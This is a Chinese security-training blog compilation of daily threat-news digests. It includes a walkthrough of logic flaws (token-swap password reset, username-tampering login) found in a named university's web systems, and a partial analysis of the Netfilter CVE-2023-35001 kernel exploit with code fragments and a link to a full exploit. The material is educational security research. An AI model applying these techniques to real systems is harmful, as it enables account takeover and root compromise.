网络安全日报 2024年04月29日
1、研究人员发现利用Electron制作的恶意程序
https://asec.ahnlab.com/en/64445 研究人员发现了一种由Electron制成的窃密木马样本。Electron应用程序使用NSIS安装程序,攻击者利用Electron将恶意程序打包在NSIS安装程序中。研究人员发现两种案例:一种是攻击者将恶意代码添加至JS脚本中,由于Electron通过node.js与操作系统交互,因此攻击者利用这一点执行恶意代码,窃取用户的信息;第二种则是恶意程序伪装成TeamViewer相关文件并将收集到的用户信息上传到gofile中,上传的数据包括系统信息、浏览器历史记录以及保存的ID和密码信息。
2、Brocade SANnav中存在多个安全漏洞
https://www.securityweek.com/vulnerabilities-expose-brocade-san-appliances-switches-to-hacking 研究人员称,Brocade SANnav存储区域网络(SAN)管理应用程序中的多个漏洞可能被利用来破坏设备和光纤通道交换机。研究人员在该设备中总共发现了18个安全漏洞,包括未经身份验证的漏洞,允许远程攻击者以root身份登录易受攻击的设备。其中,有9个漏洞被分配了CVE标识符:CVE-2024-2859和CVE-2024-29960到CVE-2024-29967。研究人员称,其中三个问题可能允许攻击者发送
3、攻击者针对Okta进行撞库攻击
https://www.bleepingcomputer.com/news/security/okta-warns-of-unprecedented-credential-stuffing-attacks-on-customers Okta警告说,针对其身份和访问管理解决方案的撞库攻击激增,一些客户帐户在攻击中遭到破坏。攻击者使用凭据填充来破坏用户帐户,方法是以自动方式尝试从网络犯罪分子那里购买的用户名和密码列表。Okta表示,这些攻击中似乎使用了与Cisco Talos此前报道的暴力破解和密码喷射攻击中相同的基础设施。在Okta观察到的所有攻击中,请求都来自 TOR匿名化网络以及多种代理(
4、Megazord勒索软件针对医疗和政府机构进行攻击
https://cybersecuritynews.com/megazord-ransomware-attacks Megazord是一种针对医疗保健、教育和政府机构、使用Rust开发的勒索软件。其传播通常始于鱼叉式网络钓鱼以及漏洞利用。其攻击者使用RDP和IP扫描器来检测受害者内部网络并横向移动,入侵后会在加密本地数据存储和文件之前终止进程和服务。该勒索软件对加密的文件添加“POWERRANGES”扩展名,并在每个受影响的文件夹中写入一个名为“powerranges.txt”的勒索信。该勒索信指示受害者使用唯一的Telegram频道链接通过TOX联系攻击者。此外,Megazord与Akir
5、朝鲜黑客组织攻击数十家韩国国防公司
https://therecord.media/south-korean-defense-companies-cyber-espionage-north-korea 韩国安全部门确定了三个平壤支持的组织对这些攻击负责,这些组织被全球执法和网络安全研究人员称为Lazarus、Kimsuky和Andariel。
6、英国莱斯特市遭遇网络攻击后城市路灯无法关闭
https://www.darkreading.com/cyberattacks-data-breaches/lights-on-in-leicester-city-streetlights-in-disarray-after-cyberattack 网络攻击后果的最新发展引起了当地人的关注,因为灯光使用的能源量很大,这可能会推高电力成本。埃文斯在一封电子邮件中被告知,灯光问题应在五月第一周结束前得到解决。
7、SpaceX 泄露近150GB数据,以及三千份图纸
https://www.freebuf.com/news/399567.html SpaceX 据称遭遇了一起网络安全事件。据报道,该事件与黑客组织 Hunters International 有关,该组织发布了 SpaceX 数据泄露的样本。此次泄露的数据为SpaceX 相对较旧的数据,Hunters International 在此次勒索事件中采用了 “指名道姓 ”的策略施加勒索压力。有趣的是,在 SpaceX 于 2023 年初面临的一次数据泄露事件中,也涉及到了这些样本,当时的泄露事件据称与 LockBit 勒索软件组织有关。
8、为遏制网络诈骗,日本警方在便利店投放虚假支付卡
https://www.freebuf.com/news/399593.html 由于近来网络诈骗较为猖獗,一些国家民众尤其是老年人难以具备充足的辨别能力,成为了网络诈骗分析的重点“集火”对象。对此,日本警方推出了一种假冒的”诈骗支付卡“,以提醒老年人不要上当受骗。这种卡片表面标有“病毒特洛伊木马清除支付卡”和“未付账单滞纳金支付卡”,目前已由日本福井县越前警察局制作并投放在了当地34家便利店。
9、印度ICICI银行暴露17000名客户的信用卡数据
https://securityaffairs.com/162479/security/icici-bank-technical-glitch.html ICICI 银行是印度领先的私人银行之一,意外地将数千张新信用卡的数据暴露给非预期接收者的客户。
10、伪造的npm 包用于诱骗软件开发人员安装恶意软件
https://thehackernews.com/2024/04/bogus-npm-packages-used-to-trick.html 一项正在进行的社会工程活动针对软件开发人员,以求职面试为幌子,使用伪造的 npm 软件包来诱骗他们下载 Python 后门。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
蚁景科技应邀参加长沙市首届网络安全工匠培养沙龙
4月25日,由中共长沙市委网信办、长沙市工业和信息化局、长沙市总工会指导,长沙市网络空间安全和信息化协会、长沙市信息技术集成工会工委、长沙市国链安全可靠计算机产业促进中心主办的“长沙市首届网络安全工匠培养沙龙”在长沙富兴世界金融中心成功举办。来自网络空间安全相关产业、高校院所、企事业单位、实训基地、协会各会员代表等100余人参加会议,共谋网络安全人才培养美好蓝图。湖南蚁景科技有限公司作为专注网安人才培养的行业示范单位应邀出席此次活动。
市委网络安全和信息化委员会办公室四级调研员王春华出席活动并致辞。
活动中,网络安全工匠培训和比武计划正式发布。长沙将联合全市各部门单位、高校院所、研发机构、重点企业、实训基地等,以为建设全球研发中心城市提供网络安全保障为方向,全面推动长沙市网络安全工匠培训和比武计划行动,不断创新网络安全人才培养模式,共同助力长沙市网络安全人才数量和质量的提升。
会上,蚁景科技做了网络安全人才线上培训的经验分享,介绍了蚁景科技在“网安人才实训LPC计划”框架下,融合学、练、赛一体的网安人才培养创新模式。通过介绍“学、练、赛”三大维度下所涵盖的在线学习、实训演练、实验教学和竞赛等多个环节,阐述了蚁景科技打造的支撑“课程学习+实验实训+网安竞赛”的网安人才实战技能培养的全生态场景。
本次会议注重打通政策、产业、技术界限,对接网安人才培养与用人需求两侧,打造政、校、企、协多方参与的交流合作平台,进一步推动网安工匠相关工作落到实处,服务长沙网络安全产教融合技术试验区建设,助力新一代自主安全计算系统产业集群高质量发展。
记一次北京某大学逻辑漏洞挖掘
0x01 信息收集
个人觉得教育src的漏洞挖掘就不需要找真实IP了,我们直接进入正题,收集某大学的子域名,可以用oneforall,这里给大家推荐一个在线查询子域名的网站:https://www.virustotal.com/ 收集到的子域名还是蛮多的,主要是子域名直接就可以复制到txt文件,方便后续域名探针。这里查询到700多个子域名。
子域名探针,我用的是Finger,网上有相应文章介绍安装,不再赘述,直接拿去跑,探针存活的站点
0x02 资产漏洞挖掘
我们需要对存活的站点进行查看,最严谨的做法是一一查看,找寻其中的漏洞,同时这样也最消磨我们这种小白的耐心,这里直接看Finger扫描输出文件里面的title,看是否带着 “系统”、“平台”、“登录”等字眼,这些站点是最好出漏洞的地方,因为他们往往存在登录框,可测的东西就多了。
最终锁定两个系统站点
0x03 任意账号密码重置
国际学生在线申请系统:https://***..edu.cn/user/login?configId=&sign=
有注册功能点就注册,没有就网上查询是否有默认密码进入,这里很幸运,有注册功能点,还不需要管理员审核,直接注册两个账号
账号1:typ123/Typ123456.
账号2:hhh123/Hhh123456.
登录typ123这个账号,进入系统,查找功能点,发现修改密码处,不需要原密码,感觉有洞可挖,直接BP抓包
BP请求响应包部分代码如下:
token=Mjg5NjQ3&newPassword=Typ654321.&confirmPassword=Typ654321.
token值进行base64解码,结果为:289647
登录hhh123账号,记录它的token值,有看没有什么规律
token=Mjg5NjQ2&newPassword=Hhh654321.&confirmPassword=Hhh654321.
解码为:289646
对比发现token值是按注册顺序逐一增大的
这里尝试将typ123的token值改为hhh123的,测试发现,成功修改hhh123账号的密码,一个逻辑漏洞到手
0x04 任意用户登录
汉字全息资源应用系统:https://***.bnu.edu.cn/#/
这里同样注册两个账号
账号1:hhh123/hhh123456
账号2:typ123/typ123456
登录typ123账号,测试内部功能点,都测了一下,没有测出所以然,突然我想起之前看到的文章,抓登录请求返回包,说干就干,果然,有不一样的地方
{"code":200,"desc":"登陆成功!","result":"{\"token\":\"69565637941600f094864d0fcb4adbdd\",\"username\":\"typ123\",\"check\":\"0\",\"mail\":\"3215545898@qq.com\"}"}
这里我试着改一改参数,看登录有没有区别,试了一下,修改username值,就可以登录其他账号,直接将username值typ123改为hhh123
code":200,"desc":"登陆成功!","result":"{\"token\":\"69565637941600f094864d0fcb4adbdd\",\"username\":\"hhh123\",\"check\":\"0\",\"mail\":\"3215545898@qq.com\"}"}
成功,直接登录
又一个逻辑漏洞到手
0x05 总结
逻辑漏洞挖掘主打一个BP抓包,看请求包和请求返回包,分析包的代码,看有没有可以利用的参数,更改参数,不断尝试,去测试所有功能点,就会有意想不到的结果。
网络安全日报 2024年04月28日
1、研究人员发现一种名为“Brokewell”的新型安卓恶意软件
https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware 安全研究人员发现了一种新的安卓恶意软件,并将其命名为Brokewell。Brokewell仍在积极开发中,并具有设备接管和远程控制功能。研究人员在一个虚假的Chrome更新页面中发现了Brokewell,该页面将会诱导用户下载安装Brokewell。Brokewell的主要功能是窃取数据并为攻击者提供远程控制。研究人员称,Brokewell背后的开发人员是一个自称Baron Samedit的人。
2、研究人员称超过1400台CrushFTP服务器易受攻击
https://www.bleepingcomputer.com/news/security/over-1-400-crushftp-servers-vulnerable-to-actively-exploited-bug 研究人员发现,超过1400台在线暴露的CrushFTP服务器容易受到漏洞利用攻击,该漏洞曾被作为零日漏洞进行利用。CrushFTP在其托管文件传输软件中将CVE-2024-4040描述为VFS沙盒逃逸,攻击者能够利用该漏洞实现任意文件读取,未经身份验证的攻击者可以使用它在受影响的系统上进行远程代码执行(RCE)。安全研究人员发现了1401个存在该安全漏洞的在线CrushF
3、瑞典饮料供应商Skanlog遭受勒索软件攻击
https://cybernews.com/news/skanlog-ransomware-sweden-alcohol-supplier 瑞典饮料供应商Skanlog最近遭到勒索软件攻击。这次攻击影响了该公司的IT系统,导致3个大型饮料仓库无法将货物运送到Systembolaget的零售店。Systembolaget是一家国有连锁酒类商店,是瑞典唯一一家允许销售酒精含量超过3.5%的酒精饮料的连锁店。根据Systembolaget的声明,Skanlog的供应中断影响了该零售商四分之一的销售额。虽然目前不存在饮料短缺,但整体情况将取决于Skanlog恢复运营的速度。该供应商无法确定何时能够恢
4、攻击者滥用Autodesk Driver托管恶意PDF文件
https://www.netcraft.com/blog/autodesk-hosting-pdf-files-used-in-microsoft-phishing-attacks Autodesk Drive是一个数据共享平台,供组织在云中共享文档和文件。研究人员近期发现一个攻击活动,该活动滥用Autodesk Driver平台来托管恶意PDF文件,从而对受害者进行网络钓鱼攻击。攻击者针对目标用户发送钓鱼邮件,当受害者单击这些电子邮件中的Autodesk Driver链接时,他们将看到链接中的PDF文档,该文档中嵌入了另一个网络钓鱼链接,该链接指向一个虚假的微软登录页面中,旨在窃取受害者
5、谷歌推出Chrome 124以修复多个安全漏洞
https://cybersecuritynews.com/chrome-critical-security-update 谷歌宣布发布Chrome 124,在该版本中修复了四个漏洞,包括一个允许攻击者执行任意代码的关键安全问题。一个严重的安全漏洞是CVE-2024-4058,涉及ANGLE图形层引擎中的类型混淆。该漏洞可用于远程执行任意代码或执行有限的用户交互沙盒逃逸。此外,Chrome还修复了CVE-2024-4059、CVE-2024-4060高严重性漏洞。谷歌建议用户尽快将Chrome更新到最新版本,以降低安全风险。
6、PlugX又有新变种,感染250万个服务器
https://www.freebuf.com/news/399440.html bleepingcomputer网站消息,近日,网络安全公司Sekoia的研究人员成功接管了一个PlugX恶意软件变种的命令和控制(C2)服务器,六个月内监测到超过250万个独立IP地址的连接。自去年9月Sekoia公司捕获了与特定C2服务器相关联的唯一IP地址以来,这个服务器每天都会收到来自超过170个国家感染主机的9万多个请求。
7、OWASP 发布十大开源软件风险清单
https://www.freebuf.com/news/398276.html 近日,OWASP发文称,尽管软件供应链对开源软件 (OSS) 的依赖程度很高,但业内缺乏一致的用于了解和衡量OSS风险的方法。OSS 风险管理始于许可管理,之后延伸至CVE,但我们仍然缺乏与安全、法律和运营相关的全面的OSS风险管理方式。
8、从10到1000,“教父”系列银行木马变种近两年内疯狂激增
https://www.freebuf.com/news/399446.html 在全球广泛传播的“教父”(Godfather)系列银行木马已经衍生出超1000个变种样本,针对上百个移动端银行应用程序。“教父”银行木马首次发现于2022年,具备记录屏幕和键盘输入、拦截双因素身份验证(2FA)电话和短信、发起银行转账等功能,已迅速成为网络犯罪(尤其是移动网络犯罪)中最普遍的恶意软件即服务产品之一。
9、WP-Automatic插件因漏洞遭遇数百万次 SQL 注入攻击
https://www.freebuf.com/news/399427.html 黑客目前正积极利用 WordPress 的 WP Automatic 插件中的一个严重漏洞来创建具有管理权限的用户账户,并植入后门以实现长期访问。WP Automatic 现已被安装在 30000 多个网站上,让管理员自动从各种在线资源导入内容(如文本、图片、视频),并在WordPress 网站上发布。该漏洞被认定为 CVE-2024-27956,严重程度为9.9/10。
10、Google Chrome 再次推迟淘汰第三方 Cookie
https://digiday.com/marketing/google-delays-third-party-cookie-demise-yet-again/ Google 今年一月开始按照计划对 1% 的 Chrome 用户禁用第三方 Cookie。根据 Google 的计划,初步测试完成之后 Google 将会逐步扩大范围,直到对所有用户完全禁用第三方 Cookie。这一计划预计会在年底完成。但本周 二 Google 再次宣布了推迟,最新的时间表是明年初。原因是第三方 Cookie 的替代隐私沙盒(Privacy Sandbox)面临更多的监管审查。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年04月26日
1、MuddyWater组织利用RMM工具传播恶意软件
https://harfanglab.io/en/insidethelab/muddywater-rmm-campaign/ 研究人员表示,至少至2021年以来,MuddyWater组织一直依赖合法的远程监控和管理(RMM)软件进行网络攻击活动,包括ScreenConnect、Syncro、SimpleHelp、RemoteUtilies以及最近的Atera Agent。近期MuddyWater组织在攻击活动中利用Atera的免费试用版本。在此活动中看到的Atera Agent使用了受感染的商业和私人电子邮件账户进行注册。研究人员认为攻击者可能通过各种方法获取这些帐户,例如密码喷射、利用重复
2、WordPress插件WP Datepicker中存在安全漏洞
https://cybersecuritynews.com/wordpress-plugin-flaw/ WordPress插件WP Datepicker中存在一个安全漏洞,影响了超过10000个使用该插件的网站。该漏洞被标记为CVE-2024-3895,CVSS评分为8.8。具有订阅者级及以上访问权限的经过身份验证的攻击者可利用该漏洞更新任意选项,并利用这些选项进行权限提升。此类攻击可能允许攻击者创建管理员帐户,从而对受影响的网站构成重大风险。该漏洞是在WP Datepicker插件中发现的,该插件是一种广泛使用的工具,用于管理WordPress表单中的日期和时间输入。该漏洞存在于2.1.
3、IBM QRadar套件中存在安全漏洞
https://cybersecuritynews.com/ibm-qradar-xss-flaw/ IBM QRadar Suite Software和Cloud Pak for Security中存在安全漏洞,允许攻击者执行任意JavaScript代码。攻击者可以通过存储的跨站点脚本将恶意的可执行脚本插入到网站的代码中,从而对受影响的产品造成影响。该漏洞被标记为CVE-2023-47731,CVSS评分为5.4,是一种中危XSS漏洞。该漏洞影响IBM Cloud Pak for Security的1.10.0.0至1.10.11.0版本以及IBM QRadar Suite Softwar
4、Progress Flowmon中存在安全漏洞
https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/ Progress Flowmon具备性能跟踪、诊断以及网络检测和响应功能,被全球1500多家公司使用。该产品中存在一个安全漏洞,被标记为CVE-2024-2389,CVSS评分为10/10。攻击者可利用该漏洞使用特制的API请求,获得对Flowmon Web界面的未经身份验证的远程访问并执行任意系统命令。Progress Software已就该漏洞发出警报,警告它会影响产品v12
5、数亿条 Discord 用户的个人信息正被出售
https://www.freebuf.com/news/399310.html 一家名为Spy.pet互联网搜索公司自 2023 年 11 月以来一直在抓取并收集 Discord 用户数据,数量已达40亿条,这些信息可公开访问,分别从 14201 台服务器上收集,而这些服务器上累计有超过6亿名用户。
6、美国通过Tiktok剥离法案,不剥离将被禁用
https://www.freebuf.com/news/399302.html 当地时间4月23日晚,美国参议院通过了《保护美国人免受外国对手控制的应用程序法案》(即“Tiktok剥离法案”),并于24日由美国总统拜登签署成为法律,并正式生效。根据该法,如果字节跳动公司一年内不肯剥离其在美国的业务,将面临被禁用的命运。
7、欧洲刑警组织就重大犯罪案件中访问加密数据寻求解决方案
https://thehackernews.com/2024/04/police-chiefs-call-for-solutions-to.html 欧洲刑警组织指出,当前推行的隐私措施,如端到端加密,将阻止科技公司看到其平台上发生的任何违法行为。这也将剥夺执法部门获取和运用这些证据以阻止和起诉最严重的犯罪行为,包括儿童性虐待、人口贩卖、毒品走私、凶杀案、经济犯罪和恐怖主义罪行。
8、GitHub曝漏洞,可被黑客利用伪装成“微软”分发恶意软件
https://www.ithome.com/0/763/606.htm GitHub 目前已经删除了部分恶意软件链接,对尚未完全修复该漏洞。对于开发者而言,现阶段没有足够有效的方法阻止这种滥用,唯一的方案就是完全禁用 comment。
9、输入法重大漏洞曝光,仅华为幸免,近10亿用户受影响
https://www.freebuf.com/news/399237.html 近日,Citizenlab研究人员调查了多家厂商的输入法应用安全漏洞并报告称:除华为以外,百度、荣耀、科大讯飞、OPPO、三星、腾讯、Vivo和小米等供应商的九款应用程序中有八款均存在安全漏洞。
10、DOJ 逮捕了混币器Samourai创始人,因协助20亿美元的非法交易
https://securityaffairs.com/162279/cyber-crime/doj-seized-crypto-mixer-samourai.html 美国司法部 (DoJ) 逮捕了加密货币混合器 Samourai 的两名联合创始人,并查封了该服务。这些指控包括协助超过 20 亿美元的非法交易和洗钱超过 1 亿美元的犯罪所得。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
Netfilter漏洞提权利用(CVE-2023-35001)
前言
Netfilter是一个用于Linux操作系统的网络数据包过滤框架,它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式,以实现网络安全、网络地址转换(Network Address Translation,NAT)、数据包过滤等功能。
漏洞成因
在netfilter中存在这nft_byteorder_eval函数,该函数的作用是将寄存器中的数据以主机序或网络序存储。具体代码如下,若采用的操作是NFT_BYTEORDER_NTOH则是将数据从主机序转化为网络序,而NFT_BYTEORDER_HTON则是从网络序转换为主机序。具体转换多少个字节则是用priv->size指定的,在该操作下可以转换二、四、八字节。该漏洞也是由于在对两字节数据进行大小端序转存时出现了错误所导致的。
可以看到代码【1】中使用了联合体存储了源地址和目的地址,联合体的变量分别是u32与u16分别代表的是四字节与两字节的空间大小。然后在代码【2】与【3】处源地址是直接取出u16的变量存储到目的地址的u16变量中。
乍一看似乎很符合常理,因为在处理双字节的时候,联合体中的变量就以u16存储,若处理四字节就转化为u32存储,但是这里存在个问题,在C语言中,联合体的存储空间是以最大空间为标准,换句话说无论联合体取出的变量是u16还是u32,联合体的大小都是占用四个字节的,而不会出现双字节的情况,因此在对s与d两个联合体进行遍历时,会以四字节为单位找到下一个位置。但是在计算长度时是以双字节进行计算的,因此就会导致拷贝时发生溢出。
File: linux-5.19\net\netfilter\nft_byteorder.c
26: void nft_byteorder_eval(const struct nft_expr *expr,
27: struct nft_regs *regs,
28: const struct nft_pktinfo *pkt)
29: {
...
33: 【1】union { u32 u32; u16 u16; } *s, *d; //使用联合体存储源地址与目的地址
...
39: switch (priv->size) {
...
72: case 2:
73: switch (priv->op) {
74: case NFT_BYTEORDER_NTOH:
75: for (i = 0; i < priv->len / 2; i++)
76: 【2】d[i].u16 = ntohs((__force __be16)s[i].u16);//将源地址的数据拷贝到目的地址的低16位中
77: break;
78: case NFT_BYTEORDER_HTON:
79: for (i = 0; i < priv->len / 2; i++)
80: 【3】d[i].u16 = (__force __u16)htons(s[i].u16);
81: break;
82: }
83: break;
84: }
85: }
举个例子,我们自定义一个联合体数组dest,分别向下标0、1以及2进行赋值。
union {short a;long b;} dst[10];
int main()
{
dst[0].a = 0x1122;
dst[1].a = 0x3344;
dst[2].a = 0x5566;
return 0;
}
按照设想的情况,在使用双字节变量进行遍历的时候会以双字节为单位进行遍历,但是实际的情况如下图。可以发现即使每次赋值都是对双字节的变量进行赋值,但是再遍历的时候还是按照联合体中最大的存储空间(四字节)进行遍历的。
因此漏洞的成因如下,因此在使用nft_byteorder函数转换双字节的大小端序时溢出。
模块地址泄露
在nft_byteorder_eval函数内部,溢出的地址是在寄存器下方。因此可以通过控制寄存器的下标值选择需要泄露的地址。
在此需要观察通过nft_byteorder_eval函数可以溢出的范围,priv->len是可以人为控制的,只要满足reg * 4 + priv->len <= 0x50即可,reg代表寄存器的下标值,由于下标为0-4是属于状态值,因此不能通用,我们的reg的值需要从4开始计算起, 那0x50 - 0x10 = 0x40就是我们priv->len能设置最大的值,(0x40 / 2) * 4 = 0x80,因此(0xaf8 ~ 0xaf8 + 0x80)范围内都是可以访问到的。但是现在存在一个问题,虽然我们可以越界访问,但是每次只能获取四字节中的低两个字节。
...
75: for (i = 0; i < priv->len / 2; i++)
76: 【2】d[i].u16 = ntohs((__force __be16)s[i].u16);//将源地址的数据拷贝到目的地址的低16位中
...
将下列值传参给nft_byteorder_eval函数
/*
dst:18
src:8
priv->op:NFT_BYTEORDER_HTON
priv->len:24
priv->size:2
*/
rule_add_byteorder(r, 18, 8, NFT_BYTEORDER_HTON, 24, 2);
泄露的值如下,可以发现高两个字节的值是无法泄露的,因为在nft_byteorder_eval中,每次只拷贝了u16的变量。因此每次泄露只能获取低两字节的值。因此需要寻找其他方法进行地址的泄露。
nf_trace_fill_rule_info函数用于跟踪数据包,并且会将rule->handle的值放进数据包中回传给用户。
想要正常执行nf_trace_fill_rule_info函数需要绕过条件
rule不能为空,并且rule->is_last需要为0,即当前rule不是最后一个
info->type不能是NFT_TRACETYPE_RETURN以及info->verdict->code不能NFT_CONTINUE
/*函数递归
nft_do_chain
->
nft_trace_packet
->
__nft_trace_packet
->
nft_trace_notify
->
nf_trace_fill_rule_info
*/
File: linux-5.19\net\netfilter\nf_tables_trace.c
126: static int nf_trace_fill_rule_info(struct sk_buff *nlskb,
127: const struct nft_traceinfo *info)
128: {
129: if (!info->rule || info->rule->is_last)
130: return 0;
131:
132: /* a continue verdict with ->type == RETURN means that this is
133: * an implicit return (end of chain reached).
134: *
135: * Since no rule matched, the ->rule pointer is invalid.
136: */
137: if (info->type == NFT_TRACETYPE_RETURN &&
138: info->verdict->code == NFT_CONTINUE)
139: return 0;
140:
141: return nla_put_be64(nlskb, NFTA_TRACE_RULE_HANDLE,
142: cpu_to_be64(info->rule->handle),
143: NFTA_TRACE_PAD);
144: }
因此想要通过nf_trace_fill_rule_info函数获取数据的第一步是伪造rule。
在regs变量的下方存在jumpstack变量
结构体nft_jumpstack的构成如下,由chain、rule、last_rule组成,并且该结构体变量在regs下方,并且通过byteorder操作可以访问到jumpstack结构体,那么利用byteorder操作篡改rule。
struct nft_jumpstack {
const struct nft_chain *chain;
const struct nft_rule_dp *rule;
const struct nft_rule_dp *last_rule;
};
接下来看一下nft_rule_dp结构体,可以发现is_last是调用nf_trace_fill_rule_info函数的条件,handle是泄露的值。
struct nft_rule_dp {
u64 is_last:1,
dlen:12,
handle:42; /* for tracing */
unsigned char data[]
__attribute__((aligned(__alignof__(struct nft_expr))));
};
在进入nf_trace_fill_rule_info函数内部前需要经历规则与表达式的遍历。
File: linux-5.19\net\netfilter\nf_tables_core.c
255: for (; rule < last_rule; rule = nft_rule_next(rule)) { //遍历rule
256: nft_rule_dp_for_each_expr(expr, last, rule) { //遍历expr
257: if (expr->ops == &nft_cmp_fast_ops)
258: nft_cmp_fast_eval(expr, ®s);
259: else if (expr->ops == &nft_cmp16_fast_ops)
260: nft_cmp16_fast_eval(expr, ®s);
261: else if (expr->ops == &nft_bitwise_fast_ops)
262: nft_bitwise_fast_eval(expr, ®s);
263: else if (expr->ops != &nft_payload_fast_ops ||
264: !nft_payload_fast_eval(expr, ®s, pkt))
265: expr_call_ops_eval(expr, ®s, pkt); //执行expr->ops
266:
267: if (regs.verdict.code != NFT_CONTINUE)
268: break;
269: }
270:
271: switch (regs.verdict.code) {
272: case NFT_BREAK:
273: regs.verdict.code = NFT_CONTINUE;
274: nft_trace_copy_nftrace(&info);
275: continue;
276: case NFT_CONTINUE:
277: nft_trace_packet(&info, chain, rule,
278: NFT_TRACETYPE_RULE); //跟踪数据包
279: continue;
280: }
281: break;
282:
遍历规则的宏定义如下,若是rule->dlen没有进行改写,那么会根据rule->dlen找到下一个rule,但是当前的rule是伪造的,因此会导致在取出expr会报错。倘若将rule->dlen修改为0,则下个rule的位置就是当前rule + 8。
由于不定长数组unsigned char data[],在sizeof操作中的值为0,因此sizeof(*rule)的值为8。此时将last_rule改写成rule + 8就可以直接跳出循环。
#define nft_rule_next(rule) (void *)rule + sizeof(*rule) + rule->dlen
在完场上述流程后,就可以顺利进入nft_trace_packet函数内部,nft_trace_packet函数也比较简单,实际是调用了__nft_trace_packet函数
File: linux-5.19\net\netfilter\nf_tables_core.c
37: static inline void nft_trace_packet(struct nft_traceinfo *info,
38: const struct nft_chain *chain,
39: const struct nft_rule_dp *rule,
40: enum nft_trace_types type)
41: {
42: if (static_branch_unlikely(&nft_trace_enabled)) {
43: const struct nft_pktinfo *pkt = info->pkt;
44:
45: info->nf_trace = pkt->skb->nf_trace;
46: info->rule = rule;
47: __nft_trace_packet(info, chain, type);
48: }
49: }
可以发现想要进入nft_trace_notify函数需要满足info->trace或info->trace不为空。
File: linux-5.19\net\netfilter\nf_tables_core.c
24: static noinline void __nft_trace_packet(struct nft_traceinfo *info,
25: const struct nft_chain *chain,
26: enum nft_trace_types type)
27: {
28: if (!info->trace || !info->nf_trace)
29: return;
30:
31: info->chain = chain;
32: info->type = type;
33:
34: nft_trace_notify(info);
35: }
使用meta表达式可以设置skb->nf_trace,将skb->nf_trace设置为非空就可以进入到nft_trace_notify函数。
File: linux-5.19\net\netfilter\nft_meta.c
...
443: case NFT_META_NFTRACE:
444: value8 = nft_reg_load8(sreg);
445:
446: skb->nf_trace = !!value8;
447: break;
...
在nft_trace_notify函数内部,还会判断是否订阅NFNLGRP_NFTRACE。没订阅则无法继续执行。
File: linux-5.19\net\netfilter\nf_tables_trace.c
...
176: if (!nfnetlink_has_listeners(nft_net(pkt), NFNLGRP_NFTRACE))
177: return;
...
在libnml库中使用mnl_socket_setsockopt函数进行netlink的组订阅,由于在使用宏NFNLGRP_NFTRACE编译时会提示找不到该值,因此这里使用实际值代替了。
static int group = 9;
if (mnl_socket_setsockopt(nleak, NETLINK_ADD_MEMBERSHIP, &group,
sizeof(int)) < 0) {
perror("mnl_socket_setsockopt");
exit(EXIT_FAILURE);
}
接下来就需要具体如何伪造rule,通过byteorder操作可以首先可以将原先的chain、rule以及last_rule的地址泄露,但是只能泄露四字节。
由于我们需要找到符合上述条件的rule,并且我们只有rule的最低两个字节,因此搜索范围不大,因此需要在泄露的rule_low附近寻找一个合适的模块地址。在存储泄露的rule之前存储利用immediate以及meta_set操作,我们选择其中一个进行泄露即可。
伪造的方式也比较简单,由于is_last与dlen都需要设置为0,因此我们只需要找到两个字节为0的值,作为伪造的rule即可,伪造的rule如下。
修改后的结果如下
由于handle实际是占用42比特,但是有3个比特被设置为0了,因此实际泄露的值只有39比特,但是由于模块地址的高4个字节都是固定的0xffffffff,因此不影响模块地址的泄露。通过从数据包中提取数据得到handle的值为后,简单移位操作就可以还原。
module = ((leak << 13) >> 16);
最后泄露模块基地址成功。
总结
总结一下模块基地址的泄露流程
1. 构造基础链
设置NFT_JUMP表达式
通过meta设置为NFT_META_NFTRACE
2. 泄露链
byteorder表达式触发漏洞,第一次读chain、rule以及last_rule,第二次改写为chain,fake rule以及fake last_rule
dynset表达式泄露chain、rule、last_rule
3. 订阅NFNLGRP_NFTRACE组,接收数据包
4. 后续接着分享如何绕过kaslr以及最终提权的利用。
原版exp使用go语言写的,我使用c语言重写了一版。
完整exp:https://github.com/h0pe-ay/Vulnerability-Reproduction/tree/master/CVE-2023-35001(nftables)(c语言)
网络安全日报 2024年04月25日
1、研究人员披露一种名为Sharpil RAT的恶意软件
https://www.gdatasoftware.com/blog/2024/04/37894-sharp-info-stealer Sharpil RAT由C#编写,运行后立即尝试与Telegram bot建立连接。攻击者利用Telegram bot与恶意软件进行通信,发送命令以收集系统信息以及计算机中已安装的浏览器信息(如Google Chrome、Yandex、Brave、Edge、Slimjet、Comodo和UR浏览器)。此外,它还从Minecraft游戏服务器“Vime World”收集受害者的地理位置和用户信息。该恶意软件中使用的Telegram bot指向一个使用俄语的攻击
2、黑客利用eScan更新机制中的缺陷传播GuptiMiner
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/ 研究人员发现并分析了一个恶意软件活动,该活动劫持了反病毒产品eScan的更新机制中的缺陷,通过执行中间人攻击投放后门和挖矿程序。GuptiMiner是一种长期存在的恶意软件,可以追溯到2018年或者更早的时间。研究人员发现,通过观察Kimsuky使用的键盘记录器与GuptiMiner中部分操作之间的相似之处,GuptiMiner可能与APT组织Kimsuky
3、WordPress响应式主题中存在安全漏洞
https://cybersecuritynews.com/wordpress-responsive-theme-flaw-let-attackers-inject-malicious-html-scripts WordPress响应式主题中存在一个安全漏洞,允许攻击者将任意HTML内容注入至网站。该漏洞被标记为CVE-2024-2848,对网站完整性和用户安全构成严重风险。该漏洞是在响应式主题的页脚部分发现的,这个安全漏洞是由于save_footer_text_callback功能中缺少功能检查,攻击者可以在未经授权的情况下修改页脚文本而无需身份验证。响应式主题的开发人员已在最新更新中解决
4、UnitedHealth已向勒索组织支付赎金
